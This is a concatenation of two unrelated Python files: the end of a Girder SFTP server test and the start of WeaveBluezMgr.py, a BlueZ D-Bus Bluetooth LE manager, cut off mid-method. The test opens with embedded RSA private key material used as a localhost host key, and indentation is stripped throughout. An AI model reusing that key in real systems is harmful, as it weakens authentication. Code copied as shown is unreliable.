YxgqXOvg9QwnZ4Fjlv3b/52R89bTP+Yr6GcQdo0CgYAvLQ38igIodtVo2xGjOhso
bekjZSSUdTCLvhIixoVZDiKFPaRs+EMYfozzL2jVDnj95otPp3ALu8wQabdHzMUs
0dNK/JxxbaJh+fc6yasnp10/phjBY//VnXIvytE4KIq5TGyF4KQvI960i+27n7bq
QfJzoMNGYNlYkXcEcPRamQKBgQCVCYWElirAnZKWA6BgAYO3547ILGwJoIRTZmHF
WJif4IdDvpzwAkoRqAUbrM5Oq1BeLI0vf9xmnbPXEdP7PpkfN4bSCkVH3+557NT4
4spypBOYOM/iw9YgW6bXQHjpHMn5rZ/H9oMJmXAmUGupL6o9cwtnsTZ49lcnJypn
riZXAQKBgQCgiJ/A11HX7fUgFzBB9no2Sy1hS3u1Ld35nZf7RDegVoEn/UdWdOxn
H2T9t0EzIoSqkfPRrsqN8sv/TMIohS6frOpBojEvwUs5mxjVwswq/QgBSV2FqYck
VeccLgZzTSMNzCDMbtM+zGG5WktzFojrMIhfD0SM3CB3jECF+Dfdtg==
-----END RSA PRIVATE KEY-----
"""))
def setUpModule():
global server
server = sftp.SftpServer(('localhost', TEST_PORT), TEST_KEY)
serverThread = threading.Thread(target=server.serve_forever)
serverThread.daemon = True
serverThread.start()
def tearDownModule():
if server:
server.shutdown()
server.server_close()
base.dropAllTestDatabases()
class SftpTestCase(base.TestCase):
def testSftpService(self):
users = ({
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
}, {
'email': 'regularuser@email.com',
'login': 'regularuser',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
})
admin, user = [self.model('user').createUser(**user) for user in users]
collections = ({
'name': 'public collection',
'public': True,
'creator': admin
}, {
'name': 'private collection',
'public': False,
'creator': admin
})
privateFolder = self.model('folder').findOne({
'parentCollection': 'user',
'parentId': user['_id'],
'name': 'Private'
})
self.assertIsNotNone(privateFolder)
self.model('upload').uploadFromFile(
six.BytesIO(b'hello world'), size=11, name='test.txt', parentType='folder',
parent=privateFolder, user=user)
for coll in collections:
self.model('collection').createCollection(**coll)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Incorrect password should raise authentication error
with self.assertRaises(paramiko.AuthenticationException):
client.connect(
'localhost', TEST_PORT, username='admin', password='badpass', look_for_keys=False,
allow_agent=False)
# Authenticate as admin
client.connect(
'localhost', TEST_PORT, username='admin', password='passwd', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
self.assertEqual(sftpClient.listdir('/'), ['collection', 'user'])
# Listing an invalid top level entity should fail
with self.assertRaises(IOError):
sftpClient.listdir('/foo')
# Test listing of users, collections, and subfolders
self.assertEqual(set(sftpClient.listdir('/user/')), {'admin', 'regularuser'})
self.assertEqual(set(sftpClient.listdir('/user/admin')), {'Public', 'Private'})
self.assertEqual(
set(sftpClient.listdir('/collection')), {'public collection', 'private collection'})
self.assertEqual(sftpClient.listdir('/user/regularuser/Private'), ['test.txt'])
self.assertEqual(sftpClient.listdir('/user/regularuser/Private/test.txt'), ['test.txt'])
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/nonexistent')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private')
# Read a file using small enough buf size to require multiple chunks internally.
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
self.assertEqual(file.read(2), b'he')
self.assertEqual(file.read(), b'llo world')
# Make sure we enforce max buffer length
tmp, sftp.MAX_BUF_LEN = sftp.MAX_BUF_LEN, 2
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
with self.assertRaises(IOError):
file.read()
sftp.MAX_BUF_LEN = tmp
# Test stat capability
info = sftpClient.stat('/user/regularuser/Private')
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
# lstat should also work
info = sftpClient.lstat('/user/regularuser/Private/test.txt/test.txt')
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# File stat implementations should agree
info = file.stat()
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# Make sure we can stat the top-level entities
for path in ('/', '/user', '/collection'):
info = sftpClient.stat(path)
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
sftpClient.close()
client.close()
# Test that any username other than anonymous will fail using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('')
trans.close()
sock.close()
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('eponymous')
trans.close()
sock.close()
# Test that a connection can be opened for anonymous access using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
trans.auth_none(username='anonymous')
sftpClient = paramiko.SFTPClient.from_transport(trans)
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
trans.close()
sock.close()
# Test anonymous access
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
'localhost', TEST_PORT, username='anonymous', password='', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
client.close()
|
WeaveBluezMgr.py
|
#
# Copyright (c) 2015-2018 Nest Labs, Inc.
# Copyright (c) 2019-2020 Google LLC.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# BLE Central support for Weave Device Manager via BlueZ APIs.
#
from __future__ import absolute_import
from __future__ import print_function
import abc
import dbus
import dbus.service
import dbus.mainloop.glib
import gc
import logging
import os
import pprint
import subprocess
import sys
import threading
import time
import traceback
import uuid
import six.moves.queue
from ctypes import *
import six
from six.moves import range
try:
from gi.repository import GObject
except:
from pgi.repository import GObject
from .WeaveBleUtility import *
from .WeaveUtility import WeaveUtility
from .WeaveBleUtility import VoidPtrToUUIDString
from .WeaveBleBase import WeaveBleBase
weave_service = uuid.UUID('0000FEAF-0000-1000-8000-00805F9B34FB')
weave_tx = uuid.UUID('18EE2EF5-263D-4559-959F-4F9C429F9D11')
weave_rx = uuid.UUID('18EE2EF5-263D-4559-959F-4F9C429F9D12')
weave_service_short = uuid.UUID('0000FEAF-0000-0000-0000-000000000000')
chromecast_setup_service = uuid.UUID('0000FEA0-0000-1000-8000-00805F9B34FB')
chromecast_setup_service_short = uuid.UUID('0000FEA0-0000-0000-0000-000000000000')
BLUEZ_NAME = 'org.bluez'
ADAPTER_INTERFACE = BLUEZ_NAME + '.Adapter1'
DEVICE_INTERFACE = BLUEZ_NAME + '.Device1'
SERVICE_INTERFACE = BLUEZ_NAME + '.GattService1'
CHARACTERISTIC_INTERFACE = BLUEZ_NAME + '.GattCharacteristic1'
DBUS_PROPERTIES = 'org.freedesktop.DBus.Properties'
bleScanConnectGuardSec = 2.0
bleStatusTransitionTimeoutSec = 5.0
bleScanDefaultTimeoutSec = 10.0
bleConnectTimeoutSec = 15.0
bleDisConnectTimeoutSec = 10.0
bleSeviceDiscoveryTimeoutSec = 5.0
bleCharDiscoveryTimeoutSec = 5.0
bleSubscribeTimeoutSec = 5.0
bleWriteCharacteristicTimeoutSec = 10.0
bleIdleDelta = 0.1
secondsToMilliseconds= 1000
def get_bluez_objects(bluez, bus, interface, prefix_path):
results = []
if bluez is None or bus is None or interface is None or prefix_path is None:
return results
for item in six.iteritems(bluez.GetManagedObjects()):
delegates = item[1].get(interface)
if not delegates:
continue
slice = {}
if item[0].startswith(prefix_path):
slice['object'] = bus.get_object(BLUEZ_NAME, item[0])
slice['path'] = item[0]
results.append(slice)
return results
class BluezDbusAdapter():
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger('WeaveBLEMgr')
self.object = bluez_obj
self.adapter = dbus.Interface(bluez_obj, ADAPTER_INTERFACE)
self.adapter_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.adapter_event = threading.Event()
self.bluez = bluez
self.bus = bus
self.path = self.adapter.object_path
self.signalReceiver = None
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy adapter")
self.adapter_unregister_signal()
self.adapter = None
self.adapter_properties = None
self.adapter_event.clear()
self.bluez = None
self.bus = None
self.object = None
self.path = None
self.signalReceiver = None
def adapter_register_signal(self):
if self.signalReceiver is None:
self.logger.debug("add adapter signal")
self.signalReceiver = self.bus.add_signal_receiver(self.adapter_on_prop_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path)
def adapter_unregister_signal(self):
if self.signalReceiver is not None:
self.logger.debug(" remove adapter signal")
self.bus.remove_signal_receiver(self.signalReceiver,
signal_name="PropertiesChanged",
dbus_interface="org.freedesktop.DBus.Properties")
def adapter_on_prop_changed_cb(self, interface, changed_properties, invalidated_properties):
if len(changed_properties) == 0:
self.logger.debug( "changed_properties is empty")
return
if len(invalidated_properties) > 0:
self.logger.debug( "invalidated_properties is not empty %s" % str(invalidated_properties))
return
if interface == ADAPTER_INTERFACE:
if 'Discovering' in changed_properties:
self.adapter_event.set()
def adapter_bg_scan(self, enable):
self.adapter_event.clear()
action_flag = False
try:
if enable:
if not self.Discovering:
action_flag = True
self.logger.info( "scanning started")
self.adapter.StartDiscovery()
else:
self.logger.info("it has started scanning")
else:
if self.Discovering:
action_flag = True
self.adapter.StopDiscovery()
self.logger.info("scanning stopped")
else:
print("it has stopped scanning")
if action_flag:
if not self.adapter_event.wait(bleStatusTransitionTimeoutSec):
if enable:
self.logger.debug("scan start error")
else:
self.logger.debug("scan stop error")
self.adapter_event.clear()
except dbus.exceptions.DBusException as ex:
self.adapter_event.clear()
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
@property
def Address(self):
try:
result = self.adapter_properties.Get(ADAPTER_INTERFACE, 'Address')
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def UUIDs(self):
try:
return self.adapter_properties.Get(ADAPTER_INTERFACE, 'UUIDs')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
def SetDiscoveryFilter(self, dict):
try:
self.adapter.SetDiscoveryFilter(dict)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
@property
def Discovering(self):
try:
result = self.adapter_properties.Get(ADAPTER_INTERFACE, 'Discovering')
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
def DiscoverableTimeout(self, timeoutSec):
try:
result = self.adapter_properties.Set(ADAPTER_INTERFACE, 'DiscoverableTimeout', timeoutSec)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
def Powered(self, enable):
try:
result = self.adapter_properties.Set(ADAPTER_INTERFACE, 'Powered', enable)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
def find_devices(self, uuids):
devices = [BluezDbusDevice(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, DEVICE_INTERFACE, self.path)]
found = []
for device in devices:
for i in device.uuids:
if i in uuids:
found.append(device)
break
return found
def clear_adapter(self):
devices = [BluezDbusDevice(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, DEVICE_INTERFACE, self.path)]
for device in devices:
try:
if device.Connected:
device.device_bg_connect(False)
self.adapter.RemoveDevice(device.device.object_path)
except:
pass
class BluezDbusDevice():
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger('WeaveBLEMgr')
self.object = bluez_obj
self.device = dbus.Interface(bluez_obj, DEVICE_INTERFACE)
self.device_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.path = self.device.object_path
self.device_event = threading.Event()
if self.Name:
try:
self.device_id = uuid.uuid3(uuid.NAMESPACE_DNS, self.Name)
except UnicodeDecodeError:
self.device_id = uuid.uuid3(uuid.NAMESPACE_DNS, self.Name.encode('utf-8'))
else:
self.device_id = uuid.uuid4()
self.bluez = bluez
self.bus = bus
self.signalReceiver = None
self.path = self.device.object_path
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy device")
self.device_unregister_signal()
self.device = None
self.device_properties = None
self.device_event = None
self.device_id = None
self.bluez = None
self.bus = None
self.object = None
self.signalReceiver = None
def device_register_signal(self):
if self.signalReceiver is None:
self.logger.debug("add device signal")
self.signalReceiver = self.bus.add_signal_receiver(self.device_on_prop_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path)
def device_unregister_signal(self):
if self.signalReceiver is not None:
self.logger.debug("remove device signal")
self.bus.remove_signal_receiver(self.signalReceiver,
signal_name="PropertiesChanged",
dbus_interface=DBUS_PROPERTIES)
def device_on_prop_changed_cb(self, interface, changed_properties, invalidated_properties):
if len(changed_properties) == 0:
self.logger.debug( "changed_properties is empty")
return
if len(invalidated_properties) > 0:
self.logger.debug( "invalidated_properties is not empty %s" % str(invalidated_properties))
return
if interface == DEVICE_INTERFACE:
if 'Connected' in changed_properties:
self.device_event.set()
def device_bg_connect(self, enable):
time.sleep(bleScanConnectGuardSec)
action_flag = False
self.device_event.clear()
try:
if enable:
if not self.Connected:
action_flag = True
self.device.Connect()
self.logger.info("BLE connecting")
else:
self.logger.info("BLE has connected")
else:
if self.Connected:
action_flag = True
self.device.Disconnect()
self.logger.info("BLE disconnected")
else:
self.logger.info("BLE has disconnected")
if action_flag:
if not self.device_event.wait(bleStatusTransitionTimeoutSec):
if enable:
self.logger.info("BLE connect error")
else:
self.logger.info("BLE disconnect error")
self.device_event.clear()
except dbus.exceptions.DBusException as ex:
self.device_event.clear()
self.logger.info(str(ex))
except:
self.logger.debug(traceback.format_exc())
def service_discover(self, gatt_dic):
self.logger.info('Discovering services')
try:
expired = time.time() + bleSeviceDiscoveryTimeoutSec
while time.time() < expired:
if self.ServicesResolved:
services = [BluezDbusGattService(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, SERVICE_INTERFACE, self.path)]
for service in services:
if service.uuid in gatt_dic['services']:
self.logger.info("Service discovering success")
return service
time.sleep(bleIdleDelta)
self.logger.error("Service discovering fail")
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def uuids(self):
try:
uuids = self.device_properties.Get(DEVICE_INTERFACE, 'UUIDs')
uuid_result = []
for i in uuids:
if len(str(i)) == 4:
uuid_normal = '0000%s-0000-0000-0000-000000000000' % i
else:
uuid_normal = i
uuid_result.append(uuid.UUID(str(uuid_normal)))
return uuid_result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Address(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, 'Address')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Name(self):
try:
name = self.device_properties.Get(DEVICE_INTERFACE, 'Name')
return name
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Connected(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, 'Connected')
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
@property
def TxPower(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, 'TxPower')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def RSSI(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, 'RSSI')
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Adapter(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, 'Adapter')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def ServiceData(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, 'ServiceData')
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def ServicesResolved(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, 'ServicesResolved')
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
class BluezDbusGattService():
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger('WeaveBLEMgr')
self.object = bluez_obj
self.service = dbus.Interface(bluez_obj, SERVICE_INTERFACE)
self.service_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.bluez = bluez
self.bus = bus
self.path = self.service.object_path
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy GattService")
self.service = None
self.service_properties = None
self.bluez = None
self.bus = None
self.object = None
self.path = None
@property
def uuid(self):
try:
result = uuid.UUID(str(self.service_properties.Get(SERVICE_INTERFACE, 'UUID')))
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
@property
def Primary(self):
try:
result =bool(self.service_properties.Get(SERVICE_INTERFACE, 'Primary'))
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
@property
def Device(self):
try:
result = self.service_properties.Get(SERVICE_INTERFACE, 'Device')
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
def find_characteristic(self, uuid):
try:
expired = time.time() + bleCharDiscoveryTimeoutSec
while time.time() < expired:
characteristics = [BluezDbusGattCharacteristic(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, CHARACTERISTIC_INTERFACE, self.path)]
for characteristic in characteristics:
if characteristic.uuid == uuid:
return characteristic
time.sleep(bleIdleDelta)
self.logger.error("Char discovering fail")
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
class BluezDbusGattCharacteristic():
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger('WeaveBLEMgr')
self.object = bluez_obj
self.characteristic = dbus.Interface(bluez_obj, CHARACTERISTIC_INTERFACE)
self.characteristic_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.received = None
self.path = self.characteristic.object_path
self.bluez = bluez
self.bus = bus
self.signalReceiver = None
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy GattCharacteristic")
self.gattCharacteristic_unregister_signal()
self.characteristic = None
self.object = None
self.characteristic_properties = None
self.received = None
self.bluez = None
self.bus = None
self.path = None
self.signalReceiver = None
def gattCharacteristic_register_signal(self):
if not self.signalReceiver:
self.logger.debug("add GattCharacteristic signal")
self.signalReceiver = self.bus.add_signal_receiver(self.gatt_on_characteristic_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path)
def gattCharacteristic_unregister_signal(self):
if self.signalReceiver:
self.logger.debug("remove GattCharacteristic signal")
self.bus.remove_signal_receiver(self.signalReceiver,
bus_name=BLUEZ_NAME,
signal_name="PropertiesChanged",
dbus_interface=DBUS_PROPERTIES,
path=self.path)
self.signalReceiver = None
def gatt_on_characteristic_changed_cb(self, interface, changed_properties, invalidated_properties):
self.logger.debug("property change in" + str(self.characteristic) + str(changed_properties))
if len(changed_properties) == 0:
return
if len(invalidated_properties) > 0:
return
if interface == CHARACTERISTIC_INTERFACE:
if 'Value' in changed_properties:
if self.received:
self.received(changed_properties['Value'])
def WriteValue(self, value, options, reply_handler, error_handler, timeout):
try:
self.characteristic.WriteValue(value, options, reply_handler=reply_handler, error_handler=error_handler, timeout=timeout)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
@property
def uuid(self):
try:
result = uuid.UUID(str(self.characteristic_properties.Get(CHARACTERISTIC_INTERFACE, 'UUID')))
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except:
self.logger.debug(traceback.format_exc())
return None
def StartNotify(self, cbfunct, reply_handler, error_handler, timeout):
try:
if not cbfunct:
self.logger.info("please provide the notify callback function")
self.received = cbfunct
self.gattCharacteristic_register_signal()
self.characteristic.StartNotify(reply_handler=reply_handler, error_handler=error_handler, timeout=timeout)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
def StopNotify(self, reply_handler, error_handler, timeout):
try:
self.logger.debug("stopping notifying")
self.characteristic.StopNotify(reply_handler=reply_handler, error_handler=error_handler, timeout=timeout)
self.gattCharacteristic_unregister_signal()
self.received = None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except:
self.logger.debug(traceback.format_exc())
@property
def Notifying(self):
try:
result = self.characteristic_properties.Get(CHARACTERISTIC_INTERFACE, 'Notifying')
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except:
self.logger.debug(traceback.format_exc())
return False
class BluezManager(WeaveBleBase):
def __init__(self, devMgr, logger=None):
if logger:
self.logger = logger
else:
self.logger = logging.getLogger('WeaveBLEMgr')
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
self.scan_quiet= False
self.peripheral_list = []
self.weave_queue = six.moves.queue.Queue()
self.Gmainloop = None
self.daemon_thread = None
self.adapter = None
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
GObject.threads_init()
dbus.mainloop.glib.threads_init()
self.bus = dbus.SystemBus()
self.bluez = dbus.Interface(self.bus.get_object(BLUEZ_NAME, '/'), 'org.freedesktop.DBus.ObjectManager')
self.target = None
self.service = None
self.orig_input_hook = None
self.hookFuncPtr = None
self.connect_state = False
self.tx = None
self.rx = None
self.setInputHook(self.readlineCB)
self.devMgr = devMgr
self.devMgr.SetBlockingCB(self.devMgrCB)
def HandleBleEventCB():
return self.GetBleEvent()
def HandleBleWriteCharCB(connObj, svcId, charId, buffer, length):
return self.WriteBleCharacteristic(connObj, svcId, charId, buffer, length)
def HandleBleSubscribeCB(connObj, svcId, charId, subscribe):
return self.SubscribeBleCharacteristic(connObj, svcId, charId, subscribe)
def HandleBleCloseCB(connObj):
return self.CloseBle(connObj)
self.devMgr.SetBleEventCB(HandleBleEventCB)
self.devMgr.SetBleWriteCharCB(HandleBleWriteCharCB)
self.devMgr.SetBleSubscribeCharCB(HandleBleSubscribeCB)
self.devMgr.SetBleCloseCB(HandleBleCloseCB)
def __del__(self):
self.disconnect()
self.setInputHook(self.orig_input_hook)
self.devMgr.SetBlockingCB(None)
self.devMgr.SetBleEventCB(None)
def ble_adapter_select(self, identifier=None):
if self.adapter:
self.adapter.destroy()
self.adapter = None
self.adapter = self.get_adapter_by_addr(identifier)
self.adapter.adapter_register_signal()
self.adapter.Powered(False)
self.adapter.Powered(True)
def ble_adapter_print(self):
try:
adapters = [BluezDbusAdapter(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, ADAPTER_INTERFACE, '/org/bluez')]
for i in range(len(adapters)):
self.logger.info("adapter %s = %s" % (i, adapters[i].Address))
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
def get_adapter_by_addr(self, identifier):
try:
adapters = [BluezDbusAdapter(p['object'], self.bluez, self.bus, self.logger) for p in get_bluez_objects(self.bluez, self.bus, ADAPTER_INTERFACE, '/org/bluez')]
if identifier is None:
return adapters[0]
if len(adapters) > 0:
for adapter in adapters:
if str(adapter.Address).upper() == str(identifier).upper():
return adapter
self.logger.info("adapter %s cannot be found, expect the ble mac address" % (identifier))
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
def runLoopUntil(self, target=None, **kwargs):
if target:
self.daemon_thread = threading.Thread(target=self.running_thread, args=(target, kwargs))
self.daemon_thread.daemon = True
self.daemon_thread.start()
try:
self.Gmainloop = GObject.MainLoop()
self.Gmainloop.run()
except KeyboardInterrupt:
self.Gmainloop.quit()
sys.exit(1)
def running_thread(self, target, kwargs):
try:
while not self.Gmainloop or not self.Gmainloop.is_running():
time.sleep(0.00001)
target(**kwargs)
except Exception as err:
traceback.print_exc()
finally:
self.Gmainloop.quit()
def setInputHook(self, hookFunc):
"""Set the PyOS_InputHook to call the specific function."""
hookFunctionType = CFUNCTYPE(None)
self.hookFuncPtr = hookFunctionType(hookFunc)
pyos_inputhook_ptr = c_void_p.in_dll(pythonapi, "PyOS_InputHook")
# save the original so that on del we can revert it back to the way it was.
self.orig_input_hook = cast(pyos_inputhook_ptr.value, PYFUNCTYPE(c_int))
# set the new hook. readLine will call this periodically as it polls for input.
pyos_inputhook_ptr.value = cast(self.hookFuncPtr, c_void_p).value
def runIdleLoop(self, **kwargs):
time.sleep(0)
pass
def devMgrCB(self):
self.runLoopUntil(self.runIdleLoop)
def readlineCB(self):
self.runLoopUntil(self.runIdleLoop)
if self.orig_input_hook:
self.orig_input_hook()
def scan_connect(self, line):
""" API to perform both scan and connect operations in one call."""
args = self.ParseInputLine(line, "scan-connect")
if not args:
return False
if not self.adapter:
self.logger.info("use default adapter")
self.ble_adapter_select()
self.scan_quiet= args[1]
self.scan(line)
if self.target:
return self.connect(args[2])
else:
self.logger.info("Failed to scan device named: " + args[2] + ". Connection skipped.")
return False
def dump_scan_result(self, device):
self.logger.info("{0:<10}{1}".format("Name =", device.Name))
self.logger.info("{0:<10}{1}".format("ID =", device.device_id))
self.logger.info("{0:<10}{1}".format("RSSI =", device.RSSI))
self.logger.info("{0:<10}{1}".format("address =", device.Address))
self.logger.info("ADV data: " + ("".join([str(i) for i in dict(device.ServiceData).keys()])) if device.ServiceData else '')
self.logger.info("")
def scan_bg_implementation(self, **kwargs):
self.adapter.clear_adapter()
with self.weave_queue.mutex:
self.weave_queue.queue.clear()
self.adapter.adapter_bg_scan(True)
found = False
identifier = kwargs['identifier']
timeout = kwargs['timeout'] + time.time()
while time.time() < timeout:
self.peripheral_list = self.adapter.find_devices([weave_service, weave_service_short, chromecast_setup_service, chromecast_setup_service_short])
for device in self.peripheral_list:
try:
if not self.scan_quiet:
# display all scanned results
self.dump_scan_result(device)
if device.Name == identifier or str(device.Address).upper() == str(identifier.upper()):
if self.scan_quiet:
# only display the scanned target's info when quiet
self.dump_scan_result(device)
self.target = device
found = True
break
except:
pass
if found:
break
time.sleep(bleIdleDelta)
self.adapter.adapter_bg_scan(False)
def scan(self, line):
args = self.ParseInputLine(line, "scan")
if not args:
return False
self.target = None
if not self.adapter:
self.logger.info("use default adapter")
self.ble_adapter_select()
del self.peripheral_list[:]
self.scan_quiet= args[1]
self.runLoopUntil(self.scan_bg_implementation, timeout=args[0], identifier=args[2])
return True
def weaveServieCharConnect(self):
gatt_dic={'services': [weave_service, weave_service_short], 'chars': [weave_tx, weave_rx]}
self.service = self.target.service_discover(gatt_dic)
if self.service is None:
self.logger.info("weave service cannot be found")
return False
self.rx = self.service.find_characteristic(weave_rx)
if self.rx is None:
self.logger.info("weave rx char cannot be found")
return False
self.tx = self.service.find_characteristic(weave_tx)
if self.tx is None:
